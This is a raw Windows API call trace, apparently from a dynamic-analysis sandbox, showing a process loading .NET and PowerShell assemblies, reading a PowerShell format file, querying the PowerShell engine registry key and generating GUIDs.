	[0040.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0040.060] GetLastError () returned 0x57
	[0040.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0040.067] GetLastError () returned 0x57
	[0040.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0040.072] GetLastError () returned 0x57
	[0040.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0040.072] GetLastError () returned 0x57
	[0040.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0040.072] GetLastError () returned 0x57
	[0040.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.073] GetLastError () returned 0x57
	[0040.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.073] GetLastError () returned 0x57
	[0040.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.073] GetLastError () returned 0x57
	[0040.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.073] GetLastError () returned 0x57
	[0040.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.073] GetLastError () returned 0x57
	[0040.118] VirtualQuery (in: lpAddress=0x25d0e0, lpBuffer=0x25e0e0, dwLength=0x1c | out: lpBuffer=0x25e0e0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.121] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xa40f2185, Data2=0xd209, Data3=0x435c, Data4=([0]=0xbe, [1]=0xae, [2]=0x98, [3]=0xc4, [4]=0x97, [5]=0x44, [6]=0x83, [7]=0xe2))) returned 0x0
	[0040.122] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xbe0ab2ab, Data2=0xdfbb, Data3=0x412c, Data4=([0]=0x95, [1]=0x11, [2]=0xe1, [3]=0xf4, [4]=0x5e, [5]=0x21, [6]=0xea, [7]=0x36))) returned 0x0
	[0040.122] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.122] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.123] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe431dcce, Data2=0xf6c4, Data3=0x4520, Data4=([0]=0x8b, [1]=0x34, [2]=0xc0, [3]=0x41, [4]=0xe1, [5]=0xf2, [6]=0x5e, [7]=0xb8))) returned 0x0
	[0040.135] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x6c2dbdaf, Data2=0xaad9, Data3=0x4219, Data4=([0]=0xaf, [1]=0x9c, [2]=0x4e, [3]=0x83, [4]=0x19, [5]=0x17, [6]=0x3d, [7]=0xf5))) returned 0x0
	[0040.136] VirtualQuery (in: lpAddress=0x25d284, lpBuffer=0x25e284, dwLength=0x1c | out: lpBuffer=0x25e284*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.136] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.136] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.136] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x90bb0a5d, Data2=0x9281, Data3=0x4329, Data4=([0]=0xbd, [1]=0xa5, [2]=0x91, [3]=0xd1, [4]=0xd4, [5]=0x0, [6]=0x7a, [7]=0xdf))) returned 0x0
	[0040.136] VirtualQuery (in: lpAddress=0x25d284, lpBuffer=0x25e284, dwLength=0x1c | out: lpBuffer=0x25e284*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.137] VirtualQuery (in: lpAddress=0x25d19c, lpBuffer=0x25e19c, dwLength=0x1c | out: lpBuffer=0x25e19c*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.138] VirtualQuery (in: lpAddress=0x25ce50, lpBuffer=0x25de50, dwLength=0x1c | out: lpBuffer=0x25de50*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.139] VirtualQuery (in: lpAddress=0x25ce50, lpBuffer=0x25de50, dwLength=0x1c | out: lpBuffer=0x25de50*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.139] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf00e3d1f, Data2=0xa5e1, Data3=0x48c5, Data4=([0]=0x9a, [1]=0x8c, [2]=0x7d, [3]=0xa2, [4]=0xd9, [5]=0xe1, [6]=0x48, [7]=0xd8))) returned 0x0
	[0040.139] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe4c574af, Data2=0xbb99, Data3=0x428c, Data4=([0]=0x96, [1]=0xb8, [2]=0x24, [3]=0xac, [4]=0x47, [5]=0xb8, [6]=0x49, [7]=0x2))) returned 0x0
	[0040.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0040.140] GetLastError () returned 0x57
	[0040.140] SetErrorMode (uMode=0x1) returned 0x1
	[0040.140] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.140] GetLastError () returned 0x0
	[0040.140] GetFileType (hFile=0x300) returned 0x1
	[0040.140] SetErrorMode (uMode=0x1) returned 0x1
	[0040.140] GetFileType (hFile=0x300) returned 0x1
	[0040.141] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.142] GetLastError () returned 0x0
	[0040.143] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.143] GetLastError () returned 0x0
	[0040.144] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.144] GetLastError () returned 0x0
	[0040.144] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.144] GetLastError () returned 0x0
	[0040.145] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.145] GetLastError () returned 0x0
	[0040.145] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.145] GetLastError () returned 0x0
	[0040.145] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.145] GetLastError () returned 0x0
	[0040.145] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.146] GetLastError () returned 0x0
	[0040.147] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.147] GetLastError () returned 0x0
	[0040.147] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.147] GetLastError () returned 0x0
	[0040.147] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.147] GetLastError () returned 0x0
	[0040.147] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.147] GetLastError () returned 0x0
	[0040.147] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.147] GetLastError () returned 0x0
	[0040.148] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.148] GetLastError () returned 0x0
	[0040.148] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.148] GetLastError () returned 0x0
	[0040.148] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.148] GetLastError () returned 0x0
	[0040.150] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.150] GetLastError () returned 0x0
	[0040.150] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0xbce, lpOverlapped=0x0) returned 1
	[0040.150] GetLastError () returned 0x0
	[0040.151] ReadFile (in: hFile=0x300, lpBuffer=0x24b7c86, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b7c86*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.151] GetLastError () returned 0x0
	[0040.151] ReadFile (in: hFile=0x300, lpBuffer=0x24b8518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x24b8518*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.151] GetLastError () returned 0x0
	[0040.151] CloseHandle (hObject=0x300) returned 1
	[0040.151] GetLastError () returned 0x0
	[0040.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0040.151] GetLastError () returned 0x0
	[0040.151] SetErrorMode (uMode=0x1) returned 0x1
	[0040.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d9514 | out: lpFileInformation=0x24d9514*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0040.151] GetLastError () returned 0x0
	[0040.151] SetErrorMode (uMode=0x1) returned 0x1
	[0040.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0040.151] GetLastError () returned 0x0
	[0040.151] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.151] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.152] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.152] RegCloseKey (hKey=0x300) returned 0x0
	[0040.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0040.152] GetLastError () returned 0x0
	[0040.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0040.152] GetLastError () returned 0x0
	[0040.156] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x955ce1fd, Data2=0xc9b6, Data3=0x4afe, Data4=([0]=0x8d, [1]=0x57, [2]=0xba, [3]=0x9c, [4]=0x9c, [5]=0x42, [6]=0xaa, [7]=0xb))) returned 0x0
	[0040.156] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe3a0ab, Data2=0x6e4a, Data3=0x4719, Data4=([0]=0xb4, [1]=0x81, [2]=0xa9, [3]=0xc2, [4]=0xcf, [5]=0xc3, [6]=0x3c, [7]=0x6b))) returned 0x0
	[0040.156] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4b0c522, Data2=0x2e9a, Data3=0x4e28, Data4=([0]=0xae, [1]=0xae, [2]=0xa4, [3]=0x0, [4]=0xf, [5]=0x9c, [6]=0x8b, [7]=0x7a))) returned 0x0
	[0040.157] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xaecca44a, Data2=0x688e, Data3=0x454e, Data4=([0]=0x81, [1]=0xbe, [2]=0xd8, [3]=0x6c, [4]=0x70, [5]=0x1c, [6]=0xbe, [7]=0x3c))) returned 0x0
	[0040.157] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xbdcc76e9, Data2=0x76a5, Data3=0x4488, Data4=([0]=0xa0, [1]=0xae, [2]=0x9, [3]=0x58, [4]=0x9d, [5]=0x63, [6]=0x6f, [7]=0xd8))) returned 0x0
	[0040.157] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf53d63ae, Data2=0xc5b6, Data3=0x4b99, Data4=([0]=0x98, [1]=0x6, [2]=0x6, [3]=0x37, [4]=0xe1, [5]=0x78, [6]=0x4b, [7]=0xa4))) returned 0x0
	[0040.157] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.157] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x60ad0a0e, Data2=0xb8d4, Data3=0x4eb5, Data4=([0]=0xa4, [1]=0x27, [2]=0x6d, [3]=0xd3, [4]=0x5e, [5]=0xa, [6]=0xc6, [7]=0xb0))) returned 0x0
	[0040.158] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.158] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.158] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb37fdbf6, Data2=0xb325, Data3=0x4dba, Data4=([0]=0x91, [1]=0xe4, [2]=0xbe, [3]=0x6f, [4]=0x77, [5]=0x78, [6]=0x63, [7]=0xe2))) returned 0x0
	[0040.158] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe185204e, Data2=0x109a, Data3=0x4096, Data4=([0]=0x95, [1]=0xac, [2]=0xcb, [3]=0xda, [4]=0x73, [5]=0xcd, [6]=0xbd, [7]=0xe5))) returned 0x0
	[0040.159] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc1ad1dbb, Data2=0x769e, Data3=0x47d9, Data4=([0]=0xa7, [1]=0x46, [2]=0x98, [3]=0xe6, [4]=0x0, [5]=0x85, [6]=0x59, [7]=0x7e))) returned 0x0
	[0040.159] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xa850f683, Data2=0x6459, Data3=0x4f1c, Data4=([0]=0xb1, [1]=0x93, [2]=0x27, [3]=0xd6, [4]=0x32, [5]=0xc1, [6]=0xba, [7]=0x11))) returned 0x0
	[0040.159] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.159] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3a9aaa20, Data2=0x52a6, Data3=0x45f3, Data4=([0]=0xbf, [1]=0x38, [2]=0x23, [3]=0x68, [4]=0xff, [5]=0xeb, [6]=0x53, [7]=0xb5))) returned 0x0
	[0040.159] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.160] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.160] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.160] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.161] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.161] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x98249101, Data2=0xc308, Data3=0x4064, Data4=([0]=0x91, [1]=0xc, [2]=0xda, [3]=0x3c, [4]=0x3b, [5]=0xb7, [6]=0xef, [7]=0xbc))) returned 0x0
	[0040.162] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb516436a, Data2=0xa235, Data3=0x427d, Data4=([0]=0x87, [1]=0x6d, [2]=0xf7, [3]=0x7f, [4]=0xde, [5]=0x47, [6]=0x6, [7]=0xce))) returned 0x0
	[0040.162] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x7903b041, Data2=0xb377, Data3=0x448d, Data4=([0]=0x95, [1]=0x7d, [2]=0x6a, [3]=0x8f, [4]=0xf7, [5]=0x3b, [6]=0x1a, [7]=0xc2))) returned 0x0
	[0040.162] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x769c30b0, Data2=0x2278, Data3=0x448a, Data4=([0]=0xaf, [1]=0x2b, [2]=0xf9, [3]=0xc4, [4]=0xf5, [5]=0xc8, [6]=0x1d, [7]=0x67))) returned 0x0
	[0040.162] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc317dbfa, Data2=0xc387, Data3=0x4971, Data4=([0]=0xab, [1]=0x82, [2]=0x85, [3]=0x92, [4]=0x8f, [5]=0x82, [6]=0x5b, [7]=0x98))) returned 0x0
	[0040.162] VirtualQuery (in: lpAddress=0x25d284, lpBuffer=0x25e284, dwLength=0x1c | out: lpBuffer=0x25e284*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.162] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x9e1968be, Data2=0x9b82, Data3=0x4be2, Data4=([0]=0x86, [1]=0xe2, [2]=0xe3, [3]=0xc8, [4]=0x64, [5]=0xba, [6]=0xe0, [7]=0x4b))) returned 0x0
